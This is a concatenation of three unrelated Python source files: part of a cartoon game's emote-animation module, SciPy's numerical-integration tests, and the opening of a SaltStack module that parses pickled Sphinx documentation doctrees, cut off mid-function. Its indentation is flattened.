sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_confused.ogg')
def playSfx():
base.playSfx(sfx, node=toon, volume=volume)
track = Sequence(Func(toon.play, 'confused'), Func(playSfx))
duration = toon.getDuration('confused', 'torso')
return (track, duration, None)
def doSlipForward(toon, volume = 1):
sfx = base.loadSfx('phase_4/audio/sfx/MG_cannon_hit_dirt.ogg')
def playSfx():
base.playSfx(sfx, volume=volume, node=toon)
sfxDelay = 0.7
track = Sequence(Func(toon.play, 'slip-forward'), Wait(sfxDelay), Func(playSfx))
duration = toon.getDuration('slip-forward', 'torso') - sfxDelay
return (track, duration, None)
def doBored(toon, volume = 1):
sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_bored.ogg')
def playSfx():
base.playSfx(sfx, volume=volume, node=toon)
sfxDelay = 2.2
track = Sequence(Func(toon.play, 'bored'), Wait(sfxDelay), Func(playSfx))
duration = toon.getDuration('bored', 'torso') - sfxDelay
return (track, duration, None)
def doBow(toon, volume = 1):
if toon.style.torso[1] == 'd':
track = Sequence(Func(toon.play, 'curtsy'))
duration = toon.getDuration('curtsy', 'torso')
else:
track = Sequence(Func(toon.play, 'bow'))
duration = toon.getDuration('bow', 'torso')
return (track, duration, None)
def doSlipBackward(toon, volume = 1):
sfx = base.loadSfx('phase_4/audio/sfx/MG_cannon_hit_dirt.ogg')
def playSfx():
base.playSfx(sfx, volume=volume, node=toon)
sfxDelay = 0.7
track = Sequence(Func(toon.play, 'slip-backward'), Wait(sfxDelay), Func(playSfx))
duration = toon.getDuration('slip-backward', 'torso') - sfxDelay
return (track, duration, None)
def doThink(toon, volume = 1):
duration = 47.0 / 24.0 * 2
animTrack = Sequence(ActorInterval(toon, 'think', startFrame=0, endFrame=46), ActorInterval(toon, 'think', startFrame=46, endFrame=0))
track = Sequence(animTrack, duration=0)
return (track, duration, None)
def doCringe(toon, volume = 1):
track = Sequence(Func(toon.play, 'cringe'))
duration = toon.getDuration('cringe', 'torso')
return (track, duration, None)
def doResistanceSalute(toon, volume=1):
track = Sequence(
Func(toon.setChatAbsolute, OTPLocalizer.CustomSCStrings[4020], CFSpeech|CFTimeout),
Func(toon.setPlayRate, 0.75, 'victory'),
Func(toon.pingpong, 'victory', fromFrame=0, toFrame=9),
Func(toon.setPlayRate, 1, 'victory')
)
duration = 20 / toon.getFrameRate('victory')
return (track, duration, None)
def doNothing(toon, volume = 1):
return (None, 0, None)
def doSurprise(toon, volume = 1):
sfx = None
sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_surprise.ogg')
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
def playAnim(anim):
anim.start()
def stopAnim(anim):
anim.finish()
toon.stop()
sfx.stop()
anim = Sequence(ActorInterval(toon, 'conked', startFrame=9, endFrame=50), ActorInterval(toon, 'conked', startFrame=70, endFrame=101))
track = Sequence(Func(toon.stopBlink), Func(toon.surpriseEyes), Func(toon.showSurpriseMuzzle), Parallel(Func(playAnim, anim), Func(playSfx, volume)))
exitTrack = Sequence(Func(toon.hideSurpriseMuzzle), Func(toon.openEyes), Func(toon.startBlink), Func(stopAnim, anim))
return (track, 3.0, exitTrack)
def doUpset(toon, volume = 1):
sfxList = ('phase_4/audio/sfx/avatar_emotion_very_sad_1.ogg', 'phase_4/audio/sfx/avatar_emotion_very_sad.ogg')
sfx = base.loadSfx(random.choice(sfxList))
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
def playAnim(anim):
anim.start()
def stopAnim(anim):
anim.finish()
toon.stop()
sfx.stop()
anim = Sequence(ActorInterval(toon, 'bad-putt', startFrame=29, endFrame=59, playRate=-0.75), ActorInterval(toon, 'bad-putt', startFrame=29, endFrame=59, playRate=0.75))
track = Sequence(Func(toon.sadEyes), Func(toon.blinkEyes), Func(toon.showSadMuzzle), Parallel(Func(playAnim, anim), Func(playSfx, volume)))
exitTrack = Sequence(Func(toon.hideSadMuzzle), Func(toon.normalEyes), Func(stopAnim, anim))
return (track, 4.0, exitTrack)
def doDelighted(toon, volume = 1):
sfx = None
sfx = base.loadSfx('phase_4/audio/sfx/delighted_06.ogg')
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
def playAnim(anim):
anim.start()
def stopAnim(anim):
anim.finish()
toon.stop()
sfx.stop()
anim = Sequence(ActorInterval(toon, 'left'), Wait(1), ActorInterval(toon, 'left', playRate=-1))
track = Sequence(Func(toon.blinkEyes), Func(toon.showSmileMuzzle), Parallel(Func(playAnim, anim), Func(playSfx, volume)))
exitTrack = Sequence(Func(toon.hideSmileMuzzle), Func(toon.blinkEyes), Func(stopAnim, anim))
return (track, 2.5, exitTrack)
def doFurious(toon, volume = 1):
duration = toon.getDuration('angry', 'torso')
sfx = None
sfx = base.loadSfx('phase_4/audio/sfx/furious_03.ogg')
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
track = Sequence(Func(toon.angryEyes), Func(toon.blinkEyes), Func(toon.showAngryMuzzle), Func(toon.play, 'angry'), Func(playSfx, volume))
exitTrack = Sequence(Func(toon.normalEyes), Func(toon.blinkEyes), Func(toon.hideAngryMuzzle))
return (track, duration, exitTrack)
def doLaugh(toon, volume = 1):
sfx = None
sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_laugh.ogg')
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
def playAnim():
toon.setPlayRate(10, 'neutral')
toon.loop('neutral')
def stopAnim():
toon.setPlayRate(1, 'neutral')
track = Sequence(Func(toon.blinkEyes), Func(toon.showLaughMuzzle), Func(playAnim), Func(playSfx, volume))
exitTrack = Sequence(Func(toon.hideLaughMuzzle), Func(toon.blinkEyes), Func(stopAnim))
return (track, 2, exitTrack)
def doTaunt(toon, volume=1):
sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_taunt.ogg')
track = Sequence(
Func(toon.blinkEyes),
Func(toon.play, 'taunt'),
Func(base.playSfx, sfx, volume=volume, node=toon)
)
duration = toon.getDuration('taunt')
return (track, duration, None)
def getSingingNote(toon, note, volume = 1):
sfx = None
filePath = 'phase_3.5/audio/dial/'
filePrefix = 'tt_s_dlg_sng_'
fileSuffix = '.ogg'
speciesName = ToonDNA.getSpeciesName(toon.style.head)
sfx = base.loadSfx(filePath + filePrefix + speciesName + '_' + note + fileSuffix)
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
def playAnim():
toon.loop('neutral')
def stopAnim():
toon.setPlayRate(1, 'neutral')
track = Sequence(Func(toon.showSurpriseMuzzle), Parallel(Func(playAnim), Func(playSfx, volume)))
exitTrack = Sequence(Func(toon.hideSurpriseMuzzle), Func(stopAnim))
return (track, 0.1, exitTrack)
def playSingingAnim(toon):
pass
def stopSinginAnim(toon):
pass
def singNote1(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'g1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'g2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'g3')
def singNote2(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'a1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'a2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'a3')
def singNote3(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'b1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'b2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'b3')
def singNote4(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'c1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'c2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'c3')
def singNote5(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'd1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'd2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'd3')
def singNote6(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'e1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'e2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'e3')
def singNote7(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'f1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'f2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'f3')
def singNote8(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'g2')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'g3')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'g4')
def singNoteEmpty(toon, volume = 0):
track = Sequence()
return (track, 0.1, None)
def returnToLastAnim(toon):
if hasattr(toon, 'playingAnim') and toon.playingAnim:
toon.loop(toon.playingAnim)
elif not hasattr(toon, 'hp') or toon.hp > 0:
toon.loop('neutral')
else:
toon.loop('sad-neutral')
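# Each EmoteFunc entry is a [function, disable-count] pair: disable() and
# enable() in TTEmote below bump the count, and an emote-enable state change
# is broadcast for the local avatar when the count first leaves or returns
# to zero.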
EmoteFunc = [[doWave, 0],
[doHappy, 0],
[doSad, 0],
[doAnnoyed, 0],
[doSleep, 0],
[doShrug, 0],
[doVictory, 0],
[doThink, 0],
[doBored, 0],
[doApplause, 0],
[doCringe, 0],
[doConfused, 0],
[doSlipForward, 0],
[doBow, 0],
[doSlipBackward, 0],
[doResistanceSalute, 0],
[doNothing, 0],
[doYes, 0],
[doNo, 0],
[doOk, 0],
[doSurprise, 0],
[doUpset, 0],
[doDelighted, 0],
[doFurious, 0],
[doLaugh, 0],
[doTaunt, 0]]
class TTEmote(Emote.Emote):
notify = DirectNotifyGlobal.directNotify.newCategory('TTEmote')
SLEEP_INDEX = 4
def __init__(self):
self.emoteFunc = EmoteFunc
self.bodyEmotes = [0,
1,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
20,
21,
22,
23,
24,
25]
self.headEmotes = [2,
17,
18,
19]
if len(self.emoteFunc) != len(OTPLocalizer.EmoteList):
self.notify.error('Emote.EmoteFunc and OTPLocalizer.EmoteList are different lengths.')
self.track = None
self.stateChangeMsgLocks = 0
self.stateHasChanged = 0
return
def lockStateChangeMsg(self):
self.stateChangeMsgLocks += 1
def unlockStateChangeMsg(self):
if self.stateChangeMsgLocks <= 0:
print PythonUtil.lineTag() + ': someone unlocked too many times'
return
self.stateChangeMsgLocks -= 1
if self.stateChangeMsgLocks == 0 and self.stateHasChanged:
messenger.send(self.EmoteEnableStateChanged)
self.stateHasChanged = 0
def emoteEnableStateChanged(self):
if self.stateChangeMsgLocks > 0:
self.stateHasChanged = 1
else:
messenger.send(self.EmoteEnableStateChanged)
def disableAll(self, toon, msg = None):
if toon != base.localAvatar:
return
self.disableGroup(range(len(self.emoteFunc)), toon)
def releaseAll(self, toon, msg = None):
if toon != base.localAvatar:
return
self.enableGroup(range(len(self.emoteFunc)), toon)
def disableBody(self, toon, msg = None):
if toon != base.localAvatar:
return
self.disableGroup(self.bodyEmotes, toon)
def releaseBody(self, toon, msg = None):
if toon != base.localAvatar:
return
self.enableGroup(self.bodyEmotes, toon)
def disableHead(self, toon, msg = None):
if toon != base.localAvatar:
return
self.disableGroup(self.headEmotes, toon)
def releaseHead(self, toon, msg = None):
if toon != base.localAvatar:
return
self.enableGroup(self.headEmotes, toon)
def getHeadEmotes(self):
return self.headEmotes
def disableGroup(self, indices, toon):
self.lockStateChangeMsg()
for i in indices:
self.disable(i, toon)
self.unlockStateChangeMsg()
def enableGroup(self, indices, toon):
self.lockStateChangeMsg()
for i in indices:
self.enable(i, toon)
self.unlockStateChangeMsg()
def disable(self, index, toon):
if isinstance(index, types.StringType):
index = OTPLocalizer.EmoteFuncDict[index]
self.emoteFunc[index][1] = self.emoteFunc[index][1] + 1
if toon is base.localAvatar:
if self.emoteFunc[index][1] == 1:
self.emoteEnableStateChanged()
def enable(self, index, toon):
if isinstance(index, types.StringType):
index = OTPLocalizer.EmoteFuncDict[index]
self.emoteFunc[index][1] = self.emoteFunc[index][1] - 1
if toon is base.localAvatar:
if self.emoteFunc[index][1] == 0:
self.emoteEnableStateChanged()
def doEmote(self, toon, emoteIndex, ts = 0, volume = 1):
try:
func = self.emoteFunc[emoteIndex][0]
except:
print 'Error in finding emote func %s' % emoteIndex
return (None, None)
def clearEmoteTrack():
base.localAvatar.emoteTrack = None
base.localAvatar.d_setEmoteState(self.EmoteClear, 1.0)
return
if volume == 1:
track, duration, exitTrack = func(toon)
else:
track, duration, exitTrack = func(toon, volume)
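# Wrap the raw emote track: disable all emotes while it plays, append the
# optional wait/exit tracks, return the toon to its previous animation,
# re-enable emotes, and (for the local toon) clear the emote state once the
# whole sequence finishes.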
if track != None:
track = Sequence(Func(self.disableAll, toon, 'doEmote'), track)
if duration > 0:
track = Sequence(track, Wait(duration))
if exitTrack != None:
track = Sequence(track, exitTrack)
if duration > 0:
track = Sequence(track, Func(returnToLastAnim, toon))
track = Sequence(track, Func(self.releaseAll, toon, 'doEmote'), autoFinish=1)
if toon.isLocal():
track = Sequence(track, Func(clearEmoteTrack))
if track != None:
if toon.emote != None:
toon.emote.finish()
toon.emote = None
toon.emote = track
track.start(ts)
del clearEmoteTrack
return (track, duration)
def printEmoteState(self, action, msg):
pass
Emote.globalEmote = TTEmote()
|
|
from __future__ import division, print_function, absolute_import
import sys
import math
import numpy as np
from numpy import sqrt, cos, sin, arctan, exp, log, pi, Inf
from numpy.testing import (assert_, TestCase, run_module_suite, dec,
assert_allclose, assert_array_less, assert_almost_equal, assert_raises)
from scipy.integrate import quad, dblquad, tplquad, nquad
from scipy._lib.six import xrange
from scipy._lib._ccallback import LowLevelCallable
import ctypes
import ctypes.util
from scipy._lib._ccallback_c import sine_ctypes
import scipy.integrate._test_multivariate as clib_test
def assert_quad(value_and_err, tabled_value, errTol=1.5e-8):
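# The computed value must agree with the tabled value to within the reported
# error estimate, and (when errTol is given) that reported error must itself
# stay below errTol.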
value, err = value_and_err
assert_allclose(value, tabled_value, atol=err, rtol=0)
if errTol is not None:
assert_array_less(err, errTol)
class TestCtypesQuad(TestCase):
def setUp(self):
if sys.platform == 'win32':
if sys.version_info < (3, 5):
files = [ctypes.util.find_msvcrt()]
else:
files = ['api-ms-win-crt-math-l1-1-0.dll']
elif sys.platform == 'darwin':
files = ['libm.dylib']
else:
files = ['libm.so', 'libm.so.6']
for file in files:
try:
self.lib = ctypes.CDLL(file)
break
except OSError:
pass
else:
# This test doesn't work on some Linux platforms (Fedora for
# example) that put an ld script in libm.so - see gh-5370
self.skipTest("Ctypes can't import libm.so")
restype = ctypes.c_double
argtypes = (ctypes.c_double,)
for name in ['sin', 'cos', 'tan']:
func = getattr(self.lib, name)
func.restype = restype
func.argtypes = argtypes
def test_typical(self):
assert_quad(quad(self.lib.sin, 0, 5), quad(math.sin, 0, 5)[0])
assert_quad(quad(self.lib.cos, 0, 5), quad(math.cos, 0, 5)[0])
assert_quad(quad(self.lib.tan, 0, 1), quad(math.tan, 0, 1)[0])
@dec.knownfailureif(True, msg="Unreliable test, see ticket 1684.")
def test_improvement(self):
import time
start = time.time()
for i in xrange(100):
quad(self.lib.sin, 0, 100)
fast = time.time() - start
start = time.time()
for i in xrange(100):
quad(math.sin, 0, 100)
slow = time.time() - start
assert_(fast < 0.5*slow, (fast, slow))
def test_ctypes_sine(self):
quad(LowLevelCallable(sine_ctypes), 0, 1)
def test_ctypes_variants(self):
lib = ctypes.CDLL(clib_test.__file__)
sin_0 = lib._sin_0
sin_0.restype = ctypes.c_double
sin_0.argtypes = [ctypes.c_double, ctypes.c_void_p]
sin_1 = lib._sin_1
sin_1.restype = ctypes.c_double
sin_1.argtypes = [ctypes.c_int, ctypes.POINTER(ctypes.c_double), ctypes.c_void_p]
sin_2 = lib._sin_2
sin_2.restype = ctypes.c_double
sin_2.argtypes = [ctypes.c_double]
sin_3 = lib._sin_3
sin_3.restype = ctypes.c_double
sin_3.argtypes = [ctypes.c_int, ctypes.POINTER(ctypes.c_double)]
sin_4 = lib._sin_3
sin_4.restype = ctypes.c_double
sin_4.argtypes = [ctypes.c_int, ctypes.c_double]
all_sigs = [sin_0, sin_1, sin_2, sin_3, sin_4]
legacy_sigs = [sin_2, sin_4]
legacy_only_sigs = [sin_4]
# LowLevelCallables work for new signatures
for j, func in enumerate(all_sigs):
callback = LowLevelCallable(func)
if func in legacy_only_sigs:
assert_raises(ValueError, quad, callback, 0, pi)
else:
assert_allclose(quad(callback, 0, pi)[0], 2.0)
# Plain ctypes items work only for legacy signatures
for j, func in enumerate(legacy_sigs):
if func in legacy_sigs:
assert_allclose(quad(func, 0, pi)[0], 2.0)
else:
assert_raises(ValueError, quad, func, 0, pi)
class TestMultivariateCtypesQuad(TestCase):
def setUp(self):
self.lib = ctypes.CDLL(clib_test.__file__)
restype = ctypes.c_double
argtypes = (ctypes.c_int, ctypes.c_double)
for name in ['_multivariate_typical', '_multivariate_indefinite',
'_multivariate_sin']:
func = getattr(self.lib, name)
func.restype = restype
func.argtypes = argtypes
def test_typical(self):
# 1) Typical function with two extra arguments:
assert_quad(quad(self.lib._multivariate_typical, 0, pi, (2, 1.8)),
0.30614353532540296487)
def test_indefinite(self):
# 2) Infinite integration limits --- Euler's constant
assert_quad(quad(self.lib._multivariate_indefinite, 0, Inf),
0.577215664901532860606512)
def test_threadsafety(self):
# Ensure multivariate ctypes are threadsafe
def threadsafety(y):
return y + quad(self.lib._multivariate_sin, 0, 1)[0]
assert_quad(quad(threadsafety, 0, 1), 0.9596976941318602)
def test_improvement(self):
def myfunc(x): # Euler's constant integrand
return -exp(-x)*log(x)
import time
start = time.time()
for i in xrange(20):
quad(self.lib._multivariate_indefinite, 0, 100)
fast = time.time() - start
start = time.time()
for i in xrange(20):
quad(myfunc, 0, 100)
slow = time.time() - start
# The nontrivial ctypes function (single variable) should run at least
# twice as fast as the pure-Python equivalent
assert_(fast < 0.5*slow, (fast, slow))
class TestQuad(TestCase):
def test_typical(self):
# 1) Typical function with two extra arguments:
def myfunc(x, n, z): # Bessel function integrand
return cos(n*x-z*sin(x))/pi
assert_quad(quad(myfunc, 0, pi, (2, 1.8)), 0.30614353532540296487)
def test_indefinite(self):
# 2) Infinite integration limits --- Euler's constant
def myfunc(x): # Euler's constant integrand
return -exp(-x)*log(x)
assert_quad(quad(myfunc, 0, Inf), 0.577215664901532860606512)
def test_singular(self):
# 3) Singular points in region of integration.
def myfunc(x):
if 0 < x < 2.5:
return sin(x)
elif 2.5 <= x <= 5.0:
return exp(-x)
else:
return 0.0
assert_quad(quad(myfunc, 0, 10, points=[2.5, 5.0]),
1 - cos(2.5) + exp(-2.5) - exp(-5.0))
def test_sine_weighted_finite(self):
# 4) Sine weighted integral (finite limits)
def myfunc(x, a):
return exp(a*(x-1))
ome = 2.0**3.4
assert_quad(quad(myfunc, 0, 1, args=20, weight='sin', wvar=ome),
(20*sin(ome)-ome*cos(ome)+ome*exp(-20))/(20**2 + ome**2))
def test_sine_weighted_infinite(self):
# 5) Sine weighted integral (infinite limits)
def myfunc(x, a):
return exp(-x*a)
a = 4.0
ome = 3.0
assert_quad(quad(myfunc, 0, Inf, args=a, weight='sin', wvar=ome),
ome/(a**2 + ome**2))
def test_cosine_weighted_infinite(self):
# 6) Cosine weighted integral (negative infinite limits)
def myfunc(x, a):
return exp(x*a)
a = 2.5
ome = 2.3
assert_quad(quad(myfunc, -Inf, 0, args=a, weight='cos', wvar=ome),
a/(a**2 + ome**2))
def test_algebraic_log_weight(self):
# 6) Algebraic-logarithmic weight.
def myfunc(x, a):
return 1/(1+x+2**(-a))
a = 1.5
assert_quad(quad(myfunc, -1, 1, args=a, weight='alg',
wvar=(-0.5, -0.5)),
pi/sqrt((1+2**(-a))**2 - 1))
def test_cauchypv_weight(self):
# 7) Cauchy principal value weighting w(x) = 1/(x-c)
def myfunc(x, a):
return 2.0**(-a)/((x-1)**2+4.0**(-a))
a = 0.4
tabledValue = ((2.0**(-0.4)*log(1.5) -
2.0**(-1.4)*log((4.0**(-a)+16) / (4.0**(-a)+1)) -
arctan(2.0**(a+2)) -
arctan(2.0**a)) /
(4.0**(-a) + 1))
assert_quad(quad(myfunc, 0, 5, args=0.4, weight='cauchy', wvar=2.0),
tabledValue, errTol=1.9e-8)
def test_double_integral(self):
# 8) Double Integral test
def simpfunc(y, x): # Note order of arguments.
return x+y
a, b = 1.0, 2.0
assert_quad(dblquad(simpfunc, a, b, lambda x: x, lambda x: 2*x),
5/6.0 * (b**3.0-a**3.0))
def test_double_integral2(self):
def func(x0, x1, t0, t1):
return x0 + x1 + t0 + t1
g = lambda x: x
h = lambda x: 2 * x
args = 1, 2
assert_quad(dblquad(func, 1, 2, g, h, args=args),35./6 + 9*.5)
def test_triple_integral(self):
# 9) Triple Integral test
def simpfunc(z, y, x, t): # Note order of arguments.
return (x+y+z)*t
a, b = 1.0, 2.0
assert_quad(tplquad(simpfunc, a, b,
lambda x: x, lambda x: 2*x,
lambda x, y: x - y, lambda x, y: x + y,
(2.,)),
2*8/3.0 * (b**4.0 - a**4.0))
class TestNQuad(TestCase):
def test_fixed_limits(self):
def func1(x0, x1, x2, x3):
val = (x0**2 + x1*x2 - x3**3 + np.sin(x0) +
(1 if (x0 - 0.2*x3 - 0.5 - 0.25*x1 > 0) else 0))
return val
def opts_basic(*args):
return {'points': [0.2*args[2] + 0.5 + 0.25*args[0]]}
res = nquad(func1, [[0, 1], [-1, 1], [.13, .8], [-.15, 1]],
opts=[opts_basic, {}, {}, {}], full_output=True)
assert_quad(res[:-1], 1.5267454070738635)
assert_(res[-1]['neval'] > 0 and res[-1]['neval'] < 4e5)
def test_variable_limits(self):
scale = .1
def func2(x0, x1, x2, x3, t0, t1):
val = (x0*x1*x3**2 + np.sin(x2) + 1 +
(1 if x0 + t1*x1 - t0 > 0 else 0))
return val
def lim0(x1, x2, x3, t0, t1):
return [scale * (x1**2 + x2 + np.cos(x3)*t0*t1 + 1) - 1,
scale * (x1**2 + x2 + np.cos(x3)*t0*t1 + 1) + 1]
def lim1(x2, x3, t0, t1):
return [scale * (t0*x2 + t1*x3) - 1,
scale * (t0*x2 + t1*x3) + 1]
def lim2(x3, t0, t1):
return [scale * (x3 + t0**2*t1**3) - 1,
scale * (x3 + t0**2*t1**3) + 1]
def lim3(t0, t1):
return [scale * (t0 + t1) - 1, scale * (t0 + t1) + 1]
def opts0(x1, x2, x3, t0, t1):
return {'points': [t0 - t1*x1]}
def opts1(x2, x3, t0, t1):
return {}
def opts2(x3, t0, t1):
return {}
def opts3(t0, t1):
return {}
res = nquad(func2, [lim0, lim1, lim2, lim3], args=(0, 0),
opts=[opts0, opts1, opts2, opts3])
assert_quad(res, 25.066666666666663)
def test_square_separate_ranges_and_opts(self):
def f(y, x):
return 1.0
assert_quad(nquad(f, [[-1, 1], [-1, 1]], opts=[{}, {}]), 4.0)
def test_square_aliased_ranges_and_opts(self):
def f(y, x):
return 1.0
r = [-1, 1]
opt = {}
assert_quad(nquad(f, [r, r], opts=[opt, opt]), 4.0)
def test_square_separate_fn_ranges_and_opts(self):
def f(y, x):
return 1.0
def fn_range0(*args):
return (-1, 1)
def fn_range1(*args):
return (-1, 1)
def fn_opt0(*args):
return {}
def fn_opt1(*args):
return {}
ranges = [fn_range0, fn_range1]
opts = [fn_opt0, fn_opt1]
assert_quad(nquad(f, ranges, opts=opts), 4.0)
def test_square_aliased_fn_ranges_and_opts(self):
def f(y, x):
return 1.0
def fn_range(*args):
return (-1, 1)
def fn_opt(*args):
return {}
ranges = [fn_range, fn_range]
opts = [fn_opt, fn_opt]
assert_quad(nquad(f, ranges, opts=opts), 4.0)
def test_matching_quad(self):
def func(x):
return x**2 + 1
res, reserr = quad(func, 0, 4)
res2, reserr2 = nquad(func, ranges=[[0, 4]])
assert_almost_equal(res, res2)
assert_almost_equal(reserr, reserr2)
def test_matching_dblquad(self):
def func2d(x0, x1):
return x0**2 + x1**3 - x0 * x1 + 1
res, reserr = dblquad(func2d, -2, 2, lambda x: -3, lambda x: 3)
res2, reserr2 = nquad(func2d, [[-3, 3], (-2, 2)])
assert_almost_equal(res, res2)
assert_almost_equal(reserr, reserr2)
def test_matching_tplquad(self):
def func3d(x0, x1, x2, c0, c1):
return x0**2 + c0 * x1**3 - x0 * x1 + 1 + c1 * np.sin(x2)
res = tplquad(func3d, -1, 2, lambda x: -2, lambda x: 2,
lambda x, y: -np.pi, lambda x, y: np.pi,
args=(2, 3))
res2 = nquad(func3d, [[-np.pi, np.pi], [-2, 2], (-1, 2)], args=(2, 3))
assert_almost_equal(res, res2)
def test_dict_as_opts(self):
try:
out = nquad(lambda x, y: x * y, [[0, 1], [0, 1]], opts={'epsrel': 0.0001})
except(TypeError):
assert False
if __name__ == "__main__":
run_module_suite()
|
|
# -*- coding: utf-8 -*-
# Usage of this is governed by a license that can be found in doc/license.rst.
import logging
import os
import pickle
import yaml
import StringIO
import collections
from ast import literal_eval
logger = logging.getLogger(__name__)
__virtualname__ = 'qa'
def __virtual__():
return __virtualname__
def _import_debug():
logger.debug("packages: %s", __salt__['pkg.list_pkgs']().keys())
logger.debug("pip list: %s", __salt__['pip.list']())
def _get_doctrees(docs_dir):
'''
Collect the pickled Sphinx doctrees built under ``docs_dir``.
:param docs_dir: directory containing the built ``.doctrees`` tree
:return: dict mapping formula name to ``[pillar_doctree, monitor_doctree]``
'''
# TODO: switch to __salt__['file.find']
pillars = []
monitors = []
for d, _, files in os.walk(os.path.join(docs_dir, '.doctrees')):
for f in files:
if f == "pillar.doctree":
pillars.append(os.path.join(d, f))
if f == "monitor.doctree":
monitors.append(os.path.join(d, f))
base_len = len(docs_dir.rstrip(os.sep).split(os.sep)) + 1
# default value: a two-item list of [pillar_doctree, monitor_doctree]
doctrees = collections.defaultdict(lambda: [None, None])
def get_name(filename):
return '.'.join(filename.split(os.sep)[base_len:-2])
# load pillar doctrees
for filename in pillars:
with open(filename) as f:
if filename.endswith(".doctrees/doc/pillar.doctree"):
name = 'common'
else:
# the name is the path - the doc/pillar.rst bit
name = get_name(filename)
assert name, ("Couldn't extract the formula name "
"from %s" % filename)
_import_debug()
try:
doctrees[name][0] = pickle.load(f)
try:
from docutils import nodes
logger.debug("Docutils from %s", nodes.__file__)
except ImportError, err:
logger.error("Can't find docutils")
pass
except ImportError, err:
raise err
# load monitors doctrees
for filename in monitors:
with open(filename) as f:
name = get_name(filename)
assert name, "Couldn't extract the formula name from %s" % filename
doctrees[name][1] = pickle.load(f)
return doctrees
def _render(data):
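# Try to evaluate the string as a Python literal first (e.g. "[1, 2]" or
# "{'a': 1}"); anything that fails falls through to the salt renderer below,
# or to plain YAML when running outside of salt.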
try:
return literal_eval(data)
except (SyntaxError, ValueError):
# this cannot be rendered as a primitive, try with the salt renderer
# NOTE: because `return` is used above, we can avoid try block nesting
pass
try:
import salt
return salt.template.compile_template_str(
data, default=__opts__['renderer'],
renderers=salt.loader.render(__opts__, __salt__))
except (NameError, ImportError):
# this was called from outside of salt or even from a system that
# doesn't have salt installed. Render as simple yaml instead
return yaml.load(StringIO.StringIO(data))
def _parse_pillar(document, root_name="pillar"):
"""
Returns a dictionary with all necessary data for a given document. It
expects the document to have the structure described above.
"""
try:
from docutils import nodes
logger.debug("Docutils from %s", nodes.__file__)
except ImportError, err:
logger.error("Can't find docutils")
_import_debug()
raise err
ret = {
'_errors': [],
'mandatory': {
'_errors': [],
'keys': [],
'examples': [],
},
'optional': {},
'conditional': {},
}
# if document is None, return an empty dictionary
if not document:
return ret
# get "pillar" sections
pillar_sections = filter(lambda x: (x.tagname == 'section' and
root_name in x.attributes['names']),
document.children)
# should be unique
if len(pillar_sections) != 1:
ret['_errors'].append(
SyntaxError("Bad number of Pillar sections: %d" %
len(pillar_sections)))
for p in pillar_sections:
# find mandatory
mandatory_sections = filter(lambda x: (
x.tagname == 'section' and
'mandatory' in x.attributes['names']), p.children)
# should be unique
if len(mandatory_sections) > 1:
ret['_errors'].append(
SyntaxError("Bad number of mandatory keys sections: %d" %
len(mandatory_sections)))
for mandatory in mandatory_sections:
# find example. Examples are literals straight under the
# "mandatory" section, after a paragraph that starts with
# "Example:"
for i, child in enumerate(mandatory.children):
if child.tagname == 'paragraph':
if child.astext().startswith("Example:"):
if len(mandatory.children) <= i + 1:
# it says "Example:" but there's no example literal
ret['mandatory']['_errors'].append(
SyntaxError("Missing literal example "
"section"))
elif (mandatory.children[i+1].tagname !=
'literal_block'):
# it says "Example:" but there's no example literal
ret['mandatory']['_errors'].append(
SyntaxError("Missing literal example section"))
else:
example = mandatory.children[i+1]
ret['mandatory']['examples'].append(
_render(example.astext()))
break
# I expect the keys to be defined directly as the titles of the
# second level
titles = mandatory.traverse(
lambda x: (isinstance(x, nodes.title) and
not x.parent == mandatory),
include_self=False)
#: rendered titles
keys = map(lambda x: x.astext(), titles)
ret['mandatory']['keys'].extend(keys)
# find optional
optional_sections = filter(lambda x: (
x.tagname == 'section' and
'optional' in x.attributes['names']), p.children)
# should be unique
if len(optional_sections) > 1:
ret["_errors"].append(
SyntaxError("Bad number of optional sections: %d" %
len(optional_sections)))
for optional in optional_sections:
# find optional keys
